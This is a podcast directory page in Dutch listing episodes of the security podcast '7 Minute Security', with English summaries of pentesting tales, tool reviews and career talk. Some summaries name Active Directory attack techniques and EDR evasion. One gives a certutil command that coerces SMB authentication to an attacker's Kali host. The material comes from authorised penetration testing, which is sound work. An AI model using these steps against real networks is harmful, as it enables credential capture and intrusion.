Brian Johnson
7 Minute Security
7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.
Bezoek zeker de website van de podcast en steun de maker: 7MinSec.com
Auteur
Brian Johnson
Categorie
Website van de podcast
Nieuwste aflevering
10 jul. 2026
Waar luisteren?
Podcasts in de app Replaio Radio Binnenkort beschikbaarPodcasts komen binnenkort naar de app. Installeer nu en zie als eerste een compleet nieuwe kijk op podcasts
Afleveringen
7MS #655: Happy Hacking Holidays 30.12.2024 58:08
Today we're doing a milkshake of several topics: wireless pentest pwnage, automating the boring pentest stuff with cursor.ai , and some closing business thoughts at 7MinSec celebrates its 7th year as a security consultancy. Links discussed today: AWUS036ACH wifi card (not my favorite anymore) Panda PAU09 N600 (love this one!) The very important Github issue that helped me better understand BPFs...
7MS #654: Tales of Pentest Pwnage – Part 67 13.12.2024 41:50
Today we've got some super cool stuff to cover today! First up, BPATTY v1.4 is out and has a slug of cool things: A whole new section on old-school wifi tools like airmon-ng, aireplay-ng and airodump-ng Syntax on using two different tools to parse creds from Dehashed An updated tutorial on using Gophish for phishing campaigns The cocoa-flavored cherry on top is a tale of pentest pwnage that...
7MS #653: How to Succeed in Business Without Really Crying – Part 20 06.12.2024 49:59
Hey friends, today we're talking about tips to effectively present your technical assessment to a variety of audiences – from lovely IT and security nerds to C-levels, the board and beyond!
7MS #652: Securing Your Mental Health - Part 6 02.12.2024 41:52
Today's episode talks about some things that helped me get through a stressful and hospital-visit-filled Thanksgiving week, including: Journaling Meditation (An activity I'm ashamed of but has actually done wonders for my mental health)
7MS #651: Tales of Pentest Pwnage – Part 66 22.11.2024 31:07
Hey friends, we've got a short but sweet tale of pentest pwnage for you today. Key lessons learned: Definitely consider BallisKit for your EDR-evasion needs If you get local admin to a box, enumerate, enumerate, enumerate! There might be a delicious task or service set to run as a domain admin that can quickly escalate your privileges!
7MS #650: Tales of Pentest Pwnage - Part 65 15.11.2024 53:40
Oooooo, giggidy! Today is (once again) my favorite tale of pentest pwnage. I learned about a feature of PowerUpSQL that helped me find a "hidden" SQL account, and that account ended up being the key to the entire pentest! I wonder how many hidden SQL accounts I've missed on past pentests….SIGH! Check out the awesome BloodHound gang thread about this here . Also, can't get Rubeus monitor mo...
7MS #649: First Impressions of Twingate 08.11.2024 1:12:12
Today we take a look at a zero-trust / ditch-your-VPN solution called Twingate (not a sponsor but we'd like them to be)! It also doubles nicely as a primary or backup connection for your DIY pentest dropboxes which we've talked about quite a bit here . In other news, we've moved from Teachable to Coursestack, so if you've bought training/ebooks with us before, you should've received some emai...
7MS #648: First Impressions of Level.io 01.11.2024 40:17
Hey friends, today I'm sharing my first (and non-sponsored) impressions of Level.io, a cool tool for managing Windows, Mac and Linux endpoints. It fits a nice little niche in our pentest dropbox deployments, it has an attractive price point and their support is fantastic.
7MS #647: How to Succeed in Business Without Really Crying – Part 19 25.10.2024 22:23
Today we're talkin' business – specifically how to make your report delivery meetings calm, cool and collect (both for you and the client!).
7MS #646: Baby's First Incident Response with Velociraptor 18.10.2024 16:15
Hey friends, today I'm putting my blue hat on and dipping my toes in incident response by way of playing with Velociraptor , a very cool (and free!) tool to find evil in your environment. Perhaps even better than the price tag, Velociraptor runs as a single binary you can deploy to spin up a server and then request endpoints to "phone home" to you by way of GPO scheduled task. The things I talk...
7MS #645: How to Succeed in Business Without Really Crying - Part 18 14.10.2024 31:02
Today I do a short travelogue about my trip to Washington, geek out about some cool training I did with Velociraptor , ponder drowning myself in blue team knowledge with XINTRA LABS , and share some thoughts about the conference talk I gave called 7 Ways to Panic a Pentester.
7MS #644: Tales of Pentest Pwnage – Part 64 04.10.2024 41:09
Hey! I'm speaking in Wanatchee, Washington next week at the NCESD conference about 7 ways to panic a pentester! Today's tale of pentest pwnage is a great reminder to enumerate, enumerate, enumerate! It also emphases that cracking NETLM/NETNTLMv1 isn't super easy to remember the steps for (at least for me) but this crack.sh article makes it a bit easier!
7MS #643: DIY Pentest Dropbox Tips – Part 11 27.09.2024 26:40
Today we continue where we left off in episode 641 , but this time talking about how to automatically deploy and install a Ubuntu-based dropbox! I also share some love for exegol as an all-in-one Active Directory pentesting platform.
7MS #642: Interview with Ron Cole of Immersive Labs 23.09.2024 42:00
Ron Cole of Immersive Labs joins us to talk pentest war stories, essential skills he learned while serving on a SOC, and the various pentest training and range platforms you can use to sharpen your security skills! Here are the links Ron shared during our discussion: VetSec Fortinet Veterans Program Immersive Labs Cyber Million FedVTE
7MS #641: DIY Pentest Dropbox Tips – Part 10 13.09.2024 27:42
Today we're revisiting the fun world of automating pentest dropboxes using Proxmox, Ansible, Cursor and Level . Plus, a tease about how all this talk about automation is getting us excited for a long-term project: creating a free/community edition of Light Pentest LITE training !
7MS #640: Tales of Pentest Pwnage – Part 63 07.09.2024 43:19
This was my favorite pentest tale of pwnage to date! There's a lot to cover in this episode so I'm going to try and bullet out the TLDR version here: Sprinkled farmer files around the environment Found high-priv boxes with WebClient enabled Added "ghost" machine to the Active Directory (we'll call it GHOSTY) RBCD attack to be able to impersonate a domain admin using the CIFS/SMB service against...
7MS #639: Tales of Pentest Pwnage - Part 62 03.09.2024 7:02
Today's tale of pentest pwnage talks about the dark powers of the net.py script from impacket .
7MS #638: Tales of Pentest Pwnage – Part 61 23.08.2024 32:44
Today we're talking pentesting – specifically some mini gems that can help you escalate local/domain/SQL privileges: Check the C: drive! If you get local admin and the system itself looks boring, check root of C – might have some interesting scripts or folders with tools that have creds in them. Also look at Look at Get-ScheduledTasks Find ids and passwords easily in Snaffler output with this Sn...
7MS #637: BPATTY[RELOADED] Release Party 17.08.2024 7:01
Hello friends, I'm excited to release BPATTY[RELOADED] into the world at https://bpatty.rocks ! – which stands for Brian's Pentesting and Technical Tips for You! It's a knowledge base of IT and security bits that help me do a better job doing security stuff! Today I do an ACTUAL 7-minute episode (GASP…what a concept!) covering my favorite bits on the site so far. Enjoy!
7MS #636: A Prelude to BPATTY(RELOADED) 12.08.2024 11:21
Artificial hype alert! I'm working on a NEW version of BPATTY (Brian's Pentesting and Technical Tips for You), but it is delayed because of a weird domain name hostage negotiation situation. It's weird. But in the meantime I want to talk about the project (which is a pentest documentation library built on Docusaurus) and how I think it will be bigger/better/stronger/faster/cooler than BPATTY v...
7MS #635: Eating the Security Dog Food - Part 7 03.08.2024 45:26
Today we're talking about eating the security dog food – specifically: Satisfying critical security control #1 Using the Atlassian family of tools to create a ticketing/change control system and wrap it into an asset inventory Leveraging Wazuh as a security monitoring system (with eventual plans to leverage its API to feed Atlassian inventory data)
7MS #634: Tales of Pentest Pwnage - Part 60 26.07.2024 32:38
Hi, today's tale of pentest pwnage covers a few wins and one loss: A cool opportunity to drop Farmer "crops" to a domain admin's desktop folder via PowerShell remote session Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login
7MS #633: How to Create a Security Knowledgebase with Docusaurus 19.07.2024 14:16
Hey friends, we're doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus ! It's cool, it's free, it's from Meta and you can get up and going in just a few commands – check out their getting started guide to get rockin' in about 5 minutes. Important files include: docusaurus.config.js – for setting the...
7MS #632: Tales of Pentest Pwnage – Part 59 12.07.2024 48:09
Today's tale of pentest pwnage includes some fun stuff, including: SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address . When you're ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder . I'm not 100% sure on this, but I think scheduled tasks captur...
7MS #631: Tales of Pentest Pwnage – Part 58 07.07.2024 15:57
Hi friends, today's a tale full of test tips and tools to help you in your adventures in pentesting! SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud'homme – fantastic resource for learning all about attacking SCCM – starting from a perspective of zero creds CMLoot – find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares S...
Vergelijkbare podcasts
Replaio is geen uitgever van podcasts; namen van shows, covers en audio zijn eigendom van hun makers en worden verspreid via openbare RSS-feeds